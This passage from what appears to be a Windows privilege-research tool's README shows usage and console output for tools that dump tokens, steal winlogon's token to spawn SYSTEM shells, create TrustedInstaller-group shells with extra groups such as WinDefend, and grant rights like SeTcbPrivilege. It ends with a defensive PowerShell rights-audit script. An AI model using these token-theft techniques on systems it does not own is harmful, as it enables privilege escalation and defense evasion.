[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[*] Done.
```
If you pass a handle value in a specific process as the -v option and that process's PID as the -p option, together with the -s flag, this tool gets verbose information for the handle as follows:
```
C:\Dev>.\TokenDump.exe -s -p 7012 -v 0x23C -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]
Token User : NT AUTHORITY\NETWORK SERVICE (SID: S-1-5-20)
Token Owner : NT AUTHORITY\NETWORK SERVICE (SID: S-1-5-20)
Primary Group : NT AUTHORITY\NETWORK SERVICE (SID: S-1-5-20)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x000000000007DF17
Authentication ID : 0x00000000000003E4
Original ID : 0x00000000000003E7
Modified ID : 0x000000000007DEE2
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : False
AppContainer : False
TokenFlags : IsFiltered, NotLow
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\SERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT SERVICE\MSDTC EnabledByDefault, Enabled, Owner
NT AUTHORITY\LogonSessionId_0_515780 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================== =========== ===== =============
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICE\MSDTC GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000070
Value[0x01] : 0x000000000007DF18
[*] Done.
```
To investigate the impersonation token applied to a thread, pass the thread ID as the -t option as follows:
```
C:\Dev>.\TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITY\SYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITY\SYSTEM
[*] Done.

C:\Dev>.\TokenDump.exe -s -p 3516 -t 4656 -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump thread token information.
[Token Information for svchost.exe (PID: 3516, TID: 4656)]
Token User : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Owner : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Primary Group : NT AUTHORITY\SYSTEM (SID: S-1-5-18)
Token Type : Impersonation
Impersonation Level : Impersonation
Token ID : 0x0000000000038CC4
Authentication ID : 0x00000000000003E7
Original ID : 0x00000000000003E7
Modified ID : 0x000000000002CE61
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : IsFiltered, NotLow, EnforceRedirectionTrust
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeAssignPrimaryTokenPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeDebugPrivilege EnabledByDefault, Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory Label\System Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTIN\Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\SERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\Authenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITY\This Organization Mandatory, EnabledByDefault, Enabled
NT SERVICE\DiagTrack EnabledByDefault, Enabled, Owner
NT AUTHORITY\LogonSessionId_0_180260 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
BUILTIN\Administrators EnabledByDefault, Enabled, Owner
DACL INFORMATION
----------------
Account Name Access Flags Type
==================== =========== ===== =============
NT AUTHORITY\SYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICE\DiagTrack GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000047
Value[0x01] : 0x000000000002C0FA
[*] Done.
```
Back to Top
Project
This tool is for learning how a primary token is assigned to a process:
```
PS C:\Dev> .\TokenAssignor.exe
TokenAssignor - Tool to execute token assigned process.
Usage: TokenAssignor.exe [Options]
-h, --help : Displays this help message.
-c, --command : Specifies a command to execute. Default is cmd.exe.
-m, --method : Specifies a method ID (0 - 3).
-p, --pid : Specifies a source PID for token stealing.
[!] -m option is required.
```
This tool tries to steal the token of a specified process and execute a process with that token assigned. Most of the methods require administrative privileges. To execute the token-assigned process with the CreateProcessAsUser API, set the -m option to 0:
```
PS C:\Dev> Get-Process winlogon
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
270 13 2452 10108 0.33 688 1 winlogon

PS C:\Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobj\user S-1-5-21-1955100404-698441589-1496171011-1001

PS C:\Dev> .\TokenAssignor.exe -p 688 -m 0
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x68).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2E0).
[+] Impersonation as winlogon.exe is successful.
[+] "C:\Windows\system32\cmd.exe" is executed successfully (PID = 9552).
[*] User of the created process is NT AUTHORITY\SYSTEM (SID: S-1-5-18).
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.

C:\Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
```
When the -m option is set to 1, this tool tries to create a suspended process and then update its primary token to the stolen token. This method cannot be used to change the session ID because of a kernel restriction: the kernel forces the session ID of the token to match the session ID of the _EPROCESS:
PS C:\Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobj\user S-1-5-21-1955100404-698441589-1496171011-1001
PS C:\Dev> .\TokenAssignor.exe -p 688 -m 1
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C8).
[+] Got a impersonation token from winlogon.exe (Handle = 0x2D8).
[+] Impersonation as winlogon.exe is successful.
[+] Suspended "C:\Windows\system32\cmd.exe" is executed successfully (PID = 9968).
[*] Current user of the suspended process is DESKTOP-5OHMOBJ\user (SID: S-1-5-21-1955100404-698441589-1496171011-1001)
[+] Primary token for the suspended process is updated successfully.
[*] Current user of the suspended process is NT AUTHORITY\SYSTEM (SID: S-1-5-18)
[*] Resuming the suspended process.
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:\Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
If the -m option is set to 2, it creates a new token-assigned process with the Secondary Logon service:
PS C:\Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobj\user S-1-5-21-1955100404-698441589-1496171011-1001
PS C:\Dev> .\TokenAssignor.exe -p 688 -m 2
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Got a primary token from PID 688 (Handle = 0x2C4).
[+] "C:\Windows\system32\cmd.exe" is executed successfully (PID = 5832).
[*] User of the created process is NT AUTHORITY\SYSTEM (SID: S-1-5-18).
PS C:\Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:\Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
If the -m option is set to 3, it creates a new token-assigned process with the PPID spoofing technique:
PS C:\Dev> whoami /user
USER INFORMATION
----------------
User Name SID
==================== =============================================
desktop-5ohmobj\user S-1-5-21-1955100404-698441589-1496171011-1001
PS C:\Dev> .\TokenAssignor.exe -p 688 -m 3
[+] SeDebugPrivilege is enabled successfully.
[+] Got a handle from PID 688 (Handle = 0x2C4).
[+] Thread attribute is built successfully.
[+] "C:\Windows\system32\cmd.exe" is executed successfully (PID = 4852).
[*] User of the created process is NT AUTHORITY\SYSTEM (SID: S-1-5-18).
PS C:\Dev>
Microsoft Windows [Version 10.0.22631.2428]
(c) Microsoft Corporation. All rights reserved.
C:\Dev>whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
Project
This tool executes a process as a member of the NT SERVICE\TrustedInstaller group. The original PoC is Grzegorz Tworek's TrustedInstallerCmd2.c. I ported it to C# and refactored it as a tool. Most operations require administrative privilege (SeDebugPrivilege, SeImpersonatePrivilege and High Mandatory Level):
PS C:\Dev> .\TrustExec.exe
TrustExec - Tool to create TrustedInstaller process.
Usage: TrustExec.exe [Options]
-h, --help : Displays this help message.
-l, --lookup : Flag to lookup account name or SID.
-n, --new-console : Flag to create new console. Use with -x flag.
-x, --exec : Flag to execute command.
-a, --account : Specifies account name to lookup.
-c, --command : Specifies command to execute. Default is cmd.exe.
-e, --extra : Specifies command to execute. Default is cmd.exe.
-m, --method : Specifies method ID. Default is 0 (NtCreateToken method).
-s, --sid : Specifies SID to lookup.
Available Method IDs:
+ 0 - Leverages NtCreateToken syscall.
+ 1 - Leverages virtual logon.
+ 2 - Leverages service logon.
+ 3 - Leverages S4U logon.
+ 4 - Leverages TrustedInstaller service.
For this module, 2 techniques are implemented. We can specify a method with the -m option. The value of the -m option can be an integer from 0 to 4. For example, if you set the -m option to 0, this tool tries to get a TrustedInstaller token with NtCreateToken:
PS C:\Dev> .\TrustExec.exe -m 0 -x -c powershell
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0xE8).
[+] Got a token assigned process (PID: 2832).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Dev> whoami /user
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
PS C:\Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
========================================= ================================================================== =======
SeCreateTokenPrivilege Create a token object Enabled
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeLockMemoryPrivilege Lock pages in memory Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeTcbPrivilege Act as part of the operating system Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeCreatePermanentPrivilege Create permanent shared objects Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeAuditPrivilege Generate security audits Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeSyncAgentPrivilege Synchronize directory service data Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeTrustedCredManAccessPrivilege Access Credential Manager as a trusted caller Enabled
SeRelabelPrivilege Modify an object label Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
PS C:\Dev> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory Label\System Mandatory Level Label S-1-16-16384
If you want to create the process with a new console, set the -n flag as follows:
PS C:\Dev> .\TrustExec.exe -m 1 -x -c powershell -n
[*] Virtual logon method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] SeTcbPrivilege is enabled successfully for current thread.
[+] A virtual domain VirtualDomain is created successfully (SID: S-1-5-110).
[+] A virtual account VirtualDomain\VirtualAdmin is created successfully (SID: S-1-5-110-500).
[+] Got a virtual logon token (Handle = 0xEC).
[+] Got a token assigned process (PID: 23836).
[+] VirtualDomain domain is removed successfully.
Every method other than the TrustedInstaller service method (ID 4 for -m) accepts extra group SIDs with the -e option. The value of the -e option must be in SDDL SID string format. To pass several SID strings, separate them with commas as follows:
PS C:\Dev> .\TrustExec.exe -m 0 -x -c powershell -e S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736,S-1-5-32-551
[*] NtCreateToken syscall method is selected.
[+] SeDebugPrivilege is enabled successfully.
[+] SeImpersonatePrivilege is enabled successfully.
[+] Impersonation as smss.exe is successful.
[+] SeAssignPrimaryTokenPrivilege is enabled successfully for current thread.
[+] SeCreateTokenPrivilege is enabled successfully for current thread.
[+] SeImpersonatePrivilege is enabled successfully for current thread.
[+] Got a TrustedInstaller token (Handle = 0x30C).
[+] Got a token assigned process (PID: 17500).
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Dev> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT SERVICE\TrustedInstaller Well-known group S-1-5-80-956008885-3418522649-1831038044-1853292631-2271478464 Enabled by default, Enabled group, Group owner
Mandatory Label\System Mandatory Level Label S-1-16-16384
NT SERVICE\WinDefend Well-known group S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736 Enabled by default, Enabled group
To resolve an account SID, set the -l flag and the -a option with the account name as follows:
PS C:\Dev> .\TrustExec.exe -l -a "nt service\windefend"
[*] Account Name : NT SERVICE\WinDefend
[*] Account SID : S-1-5-80-1913148863-3492339771-4165695881-2087618961-4109116736
[*] Account Type : WellKnownGroup
PS C:\Dev> .\TrustExec.exe -l -a users
[*] Account Name : BUILTIN\Users
[*] Account SID : S-1-5-32-545
[*] Account Type : Alias
Project
This tool manages user rights without secpol.msc. Commands other than lookup require administrator privileges:
C:\dev>UserRightsUtil.exe
UserRightsUtil - User rights management utility.
Usage: UserRightsUtil.exe [Options]
-h, --help : Displays this help message.
-m, --module : Specifies module name.
Available Modules:
+ enum - Enumerate user rights for specific account.
+ find - Find accounts have a specific user right.
+ lookup - Lookup account's SID.
+ manage - Grant or revoke user rights.
[*] To see help for each modules, specify "-m <Module> -h" as arguments.
[!] -m option is required.
To enumerate the user rights of a specific account, use the enum command with the -u and -d options, or with the -s option, as follows:
C:\dev>UserRightsUtil.exe -m enum -d contoso -u jeff
[>] Trying to enumerate user rights.
|-> Username : CONTOSO\jeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
C:\dev>UserRightsUtil.exe -m enum -s S-1-5-21-3654360273-254804765-2004310818-1105
[>] Trying to enumerate user rights.
|-> Username : CONTOSO\jeff
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1105
[+] Got 7 user right(s).
|-> SeChangeNotifyPrivilege
|-> SeIncreaseWorkingSetPrivilege
|-> SeShutdownPrivilege
|-> SeUndockPrivilege
|-> SeTimeZonePrivilege
|-> SeInteractiveLogonRight
|-> SeNetworkLogonRight
[*] Done.
If you do not specify a domain name with the -d option, the local computer name is used as the domain name:
C:\dev>hostname
CL01
C:\dev>UserRightsUtil.exe -m enum -u guest
[>] Trying to enumerate user rights.
|-> Username : CL01\Guest
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-501
[+] Got 3 user right(s).
|-> SeInteractiveLogonRight
|-> SeDenyInteractiveLogonRight
|-> SeDenyNetworkLogonRight
[*] Done.
This command finds the accounts that hold a specific user right. For example, to find the accounts that hold SeDebugPrivilege, execute it as follows:
C:\dev>UserRightsUtil.exe -m find -r debug
[>] Trying to find users with SeDebugPrivilege.
[+] Found 1 user(s).
|-> BUILTIN\Administrators (SID : S-1-5-32-544, Type : SidTypeAlias)
[*] Done.
To list the available values for the -r option, use the -l option:
C:\dev>UserRightsUtil.exe -m find -l
Available values for --right option:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
This command looks up an account's SID, as follows:
C:\dev>UserRightsUtil.exe -m lookup -d contoso -u david
[*] Result:
|-> Account Name : CONTOSO\david
|-> SID : S-1-5-21-3654360273-254804765-2004310818-1104
|-> Account Type : SidTypeUser
C:\dev>UserRightsUtil.exe -m lookup -s S-1-5-21-3654360273-254804765-2004310818-500
[*] Result:
|-> Account Name : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
|-> Account Type : SidTypeUser
C:\dev>UserRightsUtil.exe -m lookup -d contoso -u "domain admins"
[*] Result:
|-> Account Name : CONTOSO\Domain Admins
|-> SID : S-1-5-21-3654360273-254804765-2004310818-512
|-> Account Type : SidTypeGroup
If you do not specify a domain name with the -d option, the local computer name is used as the domain name:
C:\dev>hostname
CL01
C:\dev>UserRightsUtil.exe -m lookup -u admin
[*] Result:
|-> Account Name : CL01\admin
|-> SID : S-1-5-21-2659926013-4203293582-4033841475-500
|-> Account Type : SidTypeUser
This command grants or revokes user rights for a specific user account. To grant a user right, specify the user right as the value of the -g option:
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
C:\dev>UserRightsUtil.exe -m manage -g tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to grant SeTcbPrivilege.
[+] SeTcbPrivilege is granted successfully.
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
To revoke a user right, specify the user right as the value of the -r option:
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[+] Found 1 user(s).
|-> CONTOSO\Administrator (SID : S-1-5-21-3654360273-254804765-2004310818-500, Type : SidTypeUser)
[*] Done.
C:\dev>UserRightsUtil.exe -m manage -r tcb -d contoso -u administrator
[>] Target account information:
|-> Username : CONTOSO\Administrator
|-> SID : S-1-5-21-3654360273-254804765-2004310818-500
[>] Trying to revoke SeTcbPrivilege
[+] SeTcbPrivilege is revoked successfully.
C:\dev>UserRightsUtil.exe -m find -r tcb
[>] Trying to find users with SeTcbPrivilege.
[-] No users.
[*] Done.
To list the available values for the -g or -r options, use the -l option:
C:\dev>UserRightsUtil.exe -m manage -l
Available values for --grant and --revoke options:
+ TrustedCredManAccess : Specfies SeTrustedCredManAccessPrivilege.
+ NetworkLogon : Specfies SeNetworkLogonRight.
+ Tcb : Specfies SeTcbPrivilege.
+ MachineAccount : Specfies SeMachineAccountPrivilege.
+ IncreaseQuota : Specfies SeIncreaseQuotaPrivilege.
+ InteractiveLogon : Specfies SeInteractiveLogonRight.
+ RemoteInteractiveLogon : Specfies SeRemoteInteractiveLogonRight.
+ Backup : Specfies SeBackupPrivilege.
--snip--
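The lookup commands of TrustExec and UserRightsUtil above resolve account names to SIDs and back, and the find and manage commands show who holds which user right. As an added example that is not part of PrivFu or of either tool, the following PowerShell script does the same two jobs with only built-in Windows facilities, from an auditing point of view: it resolves names and SIDs through the .NET NTAccount/SecurityIdentifier classes, and it parses a secedit export of the User Rights Assignment policy to report every account holding the privileges the PoCs in this repository depend on. The function names (Resolve-Account, Get-UserRightsAssignment) and the list of rights treated as sensitive are my own choices; the script assumes an elevated PowerShell session on the machine being audited, because secedit refuses to export the policy otherwise.

```powershell
# Added example (not PrivFu code). Assumes an elevated PowerShell session.

function Resolve-Account {
    # Resolve an account name to its SID, or a SID string to its account name,
    # i.e. what "TrustExec -l -a" and "UserRightsUtil -m lookup" do.
    param([Parameter(Mandatory)][string]$Value)
    try {
        if ($Value -match '^S-1-\d+(-\d+)+$') {
            $sid = [System.Security.Principal.SecurityIdentifier]$Value
        } else {
            $sid = ([System.Security.Principal.NTAccount]$Value).Translate(
                       [System.Security.Principal.SecurityIdentifier])
        }
        # Translating back yields the canonical DOMAIN\Name spelling.
        $name = $sid.Translate([System.Security.Principal.NTAccount]).Value
        [pscustomobject]@{ Account = $name; Sid = $sid.Value; Resolved = $true }
    } catch [System.Security.Principal.IdentityNotMappedException] {
        # Orphaned SID or unknown name: report it rather than fail the audit.
        [pscustomobject]@{ Account = $Value; Sid = $null; Resolved = $false }
    }
}

function Get-UserRightsAssignment {
    # Export only the "User Rights Assignment" area of the local security policy
    # and turn the [Privilege Rights] section into (Right, Account, Sid) rows.
    [CmdletBinding()]
    param()
    $tmp = Join-Path $env:TEMP ("ura-{0}.inf" -f [guid]::NewGuid())
    try {
        & secedit.exe /export /cfg $tmp /areas USER_RIGHTS | Out-Null
        if (-not (Test-Path $tmp)) { throw "secedit export failed (not elevated?)" }

        $inSection = $false
        foreach ($line in Get-Content -Path $tmp) {
            if ($line -match '^\[(.+)\]$') {
                $inSection = ($Matches[1] -eq 'Privilege Rights')
                continue
            }
            if (-not $inSection -or $line -notmatch '^(Se\w+)\s*=\s*(.*)$') { continue }
            $right = $Matches[1]
            foreach ($entry in ($Matches[2] -split ',')) {
                $entry = $entry.Trim()
                if (-not $entry) { continue }
                # secedit writes SIDs with a leading '*'; plain names have none.
                $resolved = Resolve-Account ($entry.TrimStart('*'))
                [pscustomobject]@{
                    Right   = $right
                    Account = $resolved.Account
                    Sid     = $resolved.Sid
                }
            }
        }
    } finally {
        Remove-Item -Path $tmp -ErrorAction SilentlyContinue
    }
}

# Rights that give SYSTEM-equivalent control; the PoCs in this repository abuse these.
$sensitive = 'SeTcbPrivilege', 'SeDebugPrivilege', 'SeCreateTokenPrivilege',
             'SeAssignPrimaryTokenPrivilege', 'SeImpersonatePrivilege',
             'SeRestorePrivilege', 'SeTakeOwnershipPrivilege', 'SeLoadDriverPrivilege'

$assignments = Get-UserRightsAssignment
$assignments | Where-Object { $sensitive -contains $_.Right } |
    Sort-Object Right, Account | Format-Table Right, Account, Sid -AutoSize

# No account holds SeTcbPrivilege on a default installation; any holder is worth a look.
$tcb = $assignments | Where-Object { $_.Right -eq 'SeTcbPrivilege' }
if ($tcb) { Write-Warning ('SeTcbPrivilege is held by: ' + ($tcb.Account -join ', ')) }

# Stand-alone lookups, mirroring the README's examples above.
Resolve-Account 'BUILTIN\Users'
Resolve-Account 'S-1-5-32-544'
```

Run this before and after a `UserRightsUtil.exe -m manage` change (or on a schedule) and diff the output; a newly appearing holder of SeTcbPrivilege, SeDebugPrivilege or SeCreateTokenPrivilege is exactly the precondition the PoCs in this repository need. Unresolvable SIDs are reported with Resolved set to false instead of being dropped, since orphaned SIDs in the policy are themselves worth cleaning up.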
Thanks for your tips about Windbg extension programming:
Thanks for your outstanding research:
Thanks for your kernel driver sample: